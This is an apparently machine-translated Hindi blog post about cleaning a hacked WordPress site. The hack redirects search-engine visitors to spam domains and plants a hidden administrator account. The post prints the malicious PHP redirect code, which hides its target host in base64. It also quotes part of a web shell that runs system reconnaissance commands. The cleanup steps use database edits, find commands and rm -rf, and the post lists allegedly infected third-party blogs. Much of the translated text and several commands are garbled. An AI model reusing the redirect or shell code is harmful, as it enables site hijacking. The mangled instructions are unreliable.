वायरस ब्लॉग जगत ... लेकिन मेरे पास आपके पास क्या था?

पिछले महीने में, मैं चेतावनी प्राप्त हो गया है ब्लॉग में वायरस कुछ आगंतुकों में. मैं एक बहुत अच्छा एंटीवायरस स्थापित क्योंकि शुरू में मैं, चेतावनियों पर ध्यान नहीं दिया (Kaspersky ए.वी. 2009) और हालांकि मैं ब्लॉग पर बहुत समय बिता रहा था, मुझे वायरस अलर्ट कभी नहीं मिला (... मैंने पहले कुछ संदिग्ध देखा है, जो पहले ताज़ा हो गया था।
धीरे धीरे बड़े बदलाव दिखाई देने लगे आगंतुक यातायातजो यातायात में हाल ही में तेजी से गिर गया है और मुझे बताओ, जो अधिक से अधिक लोगों को होना शुरू हुआ है, के बाद कि stealthsettings.com यह है virused. एंटीवायरस एक अवरुद्ध कल जब मैं एक स्क्रीनशॉट किया किसी से प्राप्त लिपि से stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. यह मैं खोज सभी स्रोतों डाला कि, मेरे लिए बहुत समझाने गया था. मेरे दिमाग में आया कि पहले विचार करना था उन्नयन के नवीनतम संस्करण WordPress (2.5.1), लेकिन पुरानी लिपि में सभी फाइलों को हटाने से पहले नहीं WordPress और बनाने के लिए बैकअप डेटाबेस। यह प्रक्रिया काम नहीं करती थी और संभवत: मुझे यह पता लगाने में काफी समय लग जाता था कि बग कहां था, अगर उसने मुझे नहीं बताया होता। यूजेन कॉफी पर एक चर्चा में उन्होंने पाया लिंक गूगल और यह उसे देखने के लिए अच्छा होगा।
MyDigitalLife.info, ने एक लेख प्रकाशित किया है: "WordPress हैक: Google और खोज इंजन को पुनर्प्राप्त और ठीक करें या आपकी-Needs.info, AnyResults.Net, Golden-Info.net और अन्य अवैध साइटों पर पुनर्निर्देशित कोई कुकी ट्रैफ़िक नहीं"यही तो मैं जरूरत धागे का अंत है.
यह एक के बारे में है शोषण करना de WordPress कुकीज़ पर आधारित, जो मुझे बहुत जटिल है और लगता है कि किताब बनाया. एक बनाने के लिए काफी चालाक SQL इंजेक्शन ब्लॉग का डाटाबेस, एक अदृश्य उपयोगकर्ता बनाने के लिए एक साधारण नियमित जाँच डैशबोर्ड ->उपयोगकर्ता, "लिखने" सर्वर निर्देशिका और फाइल की जांच (वह chmod 777), खोजने के लिए और करने के लिए निष्पादित जड़ उपयोगकर्ता या समूह के विशेषाधिकारों के साथ फाइल. मैं कई ब्लॉग्स रोमानिया सहित, संक्रमित हैं कि इस तथ्य के बावजूद नाम का फायदा उठाने और उसके बारे में लिखा कुछ लेख देखते हैं कि वहाँ जो पता नहीं है. ठीक है ... मैं वायरस के बारे में सामान्योक्तियां समझाने की कोशिश करने की कोशिश करेंगे.

वायरस क्या है?

सबसे पहले, ब्लॉग पर पृष्ठों के स्रोतों डालें, दर्शकों के लिए अदृश्य लेकिन दिखाई और खोज इंजन, विशेष रूप से गूगल के लिए सूचकांकीय जोड़ता है। इस तरह हमलावर ने संकेत दिया साइटों के लिए पेज रैंक का स्थानांतरण। दूसरा, एक और डाला जाता है पुनर्निर्देशन कोड Google, Live, याहू, ... या आरएसएस रीडर से आने वाले आगंतुकों के लिए यूआरएल और इसमें साइट नहीं है कुकी. एक एंटीवायरस के रूप में पुनर्निर्देशित पता लगाता है ट्रोजन Clicker.HTML.

लक्षण:

आगंतुक यातायात में भारी गिरावट, विशेष रूप से सबसे अधिक आगंतुकों गूगल से आते हैं जहां ब्लॉग पर.

पहचान: (यह वह जगह है जहां समस्या उन लोगों के लिए जटिल हो जाती है जो phpmyadmin, php और linux)

ला। सावधान! सबसे पहले एक बैकअप डेटाबेस बनाने के लिए!

1. स्रोत फ़ाइलों की जाँच करें index.php, header.php, footer.php, ब्लॉग के विषय और एन्क्रिप्शन का उपयोग करता है कि एक कोड है देखने base64 या इसमें "if ($ ser ==" 1; && sizeof ($ _ COOKIE) == 0) "शामिल हैं:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... या कुछ और. इस कोड को नष्ट!

छवि पर क्लिक करें ...

सूचकांक कोड

ऊपर स्क्रीनशॉट में मैं गलती से चयनित और " "। वह कोड रहना चाहिए।

2. उपयोग phpMyAdmin और डेटाबेस की मेज पर जाने wp_usersपर बनाया कोई उपयोगकर्ता नाम नहीं है तो कहां की जांच 00:00:00 0000-00-00 (संभावित प्लेसमेंट user_login लिखना "WordPress" इस उपयोगकर्ता की आईडी (आईडी फ़ील्ड) लिखें और फिर इसे हटा दें।

छवि पर क्लिक करें ...

नकली उपयोगकर्ता

* ग्रीन लाइन को हटा दिया और उसकी पहचान को बनाए रखा जाना चाहिए. की दशा में सुस्तथा आईडी = 8 .

3. टेबल पर जाएं wp_usermeta, कहाँ जाना है स्थित और पोंछ आईडी के लिए लाइनें (जहां क्षेत्र user_id ID मान) को नष्ट कर दिया प्रकट होता है.

4. तालिका में wp_option, करने के लिए जाओ active_plugins और संदिग्ध सक्षम है क्या प्लगइन देखें. यह अंत की तरह इस्तेमाल किया जा सकता है _old.giff, _old.pngg, _old.jpeg, _new.php.giff, _ और _new के साथ फर्जी छवि एक्सटेंशन के संयोजन।

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

इस प्लगइन को हटाएं, फिर ब्लॉग -> डैशबोर्ड -> प्लगइन्स पर जाएं, जहां आप किसी भी प्लगइन को निष्क्रिय और सक्रिय करते हैं।

यह active_plugins वायरस फ़ाइल प्रतीत होता है देखने के लिए छवि पर क्लिक करें.

लगाना

FTP_ SSug पर पथ का पालन करें, active_plugins में इंगित करें और सर्वर पर फ़ाइल को हटाएं।

5. phpMyAdmin में भी, तालिका में wp_option, युक्त पंक्ति ढूँढें और हटाएँ "rss_f541b3abd05e7962fcab37737f40fad8"और के बीच"internal_links_cache ".
Internal_links_cache में अपने ब्लॉग को और एक में दिखाई देते हैं एन्क्रिप्टेड स्पैम लिंक बना रहे हैं का कोड Google Adsडब, हैकर.

6. सिफारिश करने के लिए है पासवर्ड बदलना ब्लॉग और प्रवेश सभी संदिग्ध userele हटाने. के नवीनतम संस्करण में अपग्रेड करें WordPress और ब्लॉग को नए उपयोगकर्ताओं के पंजीकरण को रोकने के लिए सेट करें। कोई नुकसान नहीं... वे निर्जन कमेंट भी कर सकते हैं।

मैंने ऊपर थोड़ा समझाने की कोशिश की, ऐसी स्थिति में क्या करना है, इस वायरस के ब्लॉग को साफ करने के लिए। समस्या अधिक गंभीर है जितना लगता है और लगभग हल नहीं किया गया है, क्योंकि उनका उपयोग किया जाता है सुरक्षा कमजोरियों ब्लॉग है जो वेब सर्वर होस्टिंग,.

उपयोग के साथ सुरक्षा के लिए पहली बार एक उपाय के रूप में, एसएसएचदेखने के लिए सर्वर पर कुछ चेक करें कि अगर किसी अंत के साथ * _old * और * नया. * तरह फ़ाइलों.Giff,. JPEG,. pngg,. jpgg. इन फ़ाइलों को नष्ट कर दिया जाना चाहिए. आप उदाहरण के लिए, एक फ़ाइल का नाम बदलते हैं. top_right_old.giff in top_right_old.phpहम फ़ाइल बिल्कुल शोषण कोड सर्वर है कि देखते हैं.

सर्वर की जाँच, सफाई और सुरक्षा के लिए कुछ उपयोगी निर्देश। (एसएसएच के माध्यम से)

1.  सीडी / tmp जैसे फ़ोल्डरों अगर वहाँ और जाँच tmpVFlma या अन्य संयोजन और इसे मिटा ही नाम है. नीचे स्क्रीनशॉट, मुझ से दो ऐसे फ़ोल्डरों देखें:

tmpserver

rm-आरएफ foldername

2. जाँच करें और समाप्त करें (बदलें chmod-ul) जितना संभव हो सके विशेषताओं वाले फ़ोल्डर chmod 777

वर्तमान डीआईआर में सभी लिखने योग्य फ़ाइलें ढूंढें: खोजें. प्रकार च पर्म-2-रास
वर्तमान dir में सभी लिखने योग्य निर्देशिका मिल: खोजें. प्रकार घ पर्म-2-रास
वर्तमान डीआईआर में सभी लिखने योग्य निर्देशिकाएं और फ़ाइलें ढूंढें: खोजें. -पेर्म-2-रास

3. सर्वर पर संदिग्ध फ़ाइलों के लिए खोज रहे हैं.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, सावधान! बिट सेट गई फ़ाइलें SUID si SGID. इन फ़ाइलों को उपयोगकर्ता (समूह) या रूट, नहीं फ़ाइल निष्पादित जो उपयोगकर्ता के विशेषाधिकारों के साथ निष्पादित. सुरक्षा मुद्दों अगर ये फाइलें, जड़ समझौता हो सकता है. आप SUID और SGID बिट्स के साथ फाइल का उपयोग करते हैं, 'प्रदर्शनchmod 0 " या उन पर युक्त पैकेज की स्थापना रद्द करें.

कहीं स्रोत में शामिल शोषण ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

इस तरह ... मूल रूप से सुरक्षा में उल्लंघनों पाता. बंदरगाहों निर्देशिका "लिखने" और समूह निष्पादन विशेषाधिकार फ़ाइलें / रूट खुला.

वापस अधिक के साथ ...

संक्रमित कुछ ब्लॉगों: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
मोटरसाइकिलें.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

Dragos.roua.ro, www.artistul.ro/blog/,

www.mirablismedia.ro/blog, blog.einvest.ro
... सूची पर चला जाता है ... एक बहुत.

आप जांच सकते हैं कि कोई ब्लॉग Google खोज इंजन का उपयोग करके संक्रमित है या नहीं। कॉपी पेस्ट:

साइट www.blegoo.com खरीद

शुभ रात्रि और अच्छा काम;) जल्द ही मुझे लगता है कि यूजीन prevezibil.imprevizibil.com पर समाचार लेकर आएंगे।

BRB :)

ध्यान! का विषय बदलना WordPress या अपग्रेड करें WordPress 2.5.1, इस वायरस से छुटकारा पाने का उपाय नहीं है।

तकनीकी प्रेमी के रूप में, मैं 2006 से StealthSettings.com पर खुशी से लेख लिख रहा हूँ। मेरे पास ऑपरेटिंग सिस्टम्स: macOS, Windows और Linux, साथ ही प्रोग्रामिंग भाषाओं और ब्लॉगिंग प्लेटफ़ॉर्म्स (WordPress) और ऑनलाइन स्टोर्स (WooCommerce, Magento, PrestaShop) के साथ विविध अनुभव है।

कैसे करें » ध्यान देने योग्य » वायरस ब्लॉग जगत ... लेकिन मेरे पास आपके पास क्या था?
एक टिप्पणी छोड़ दो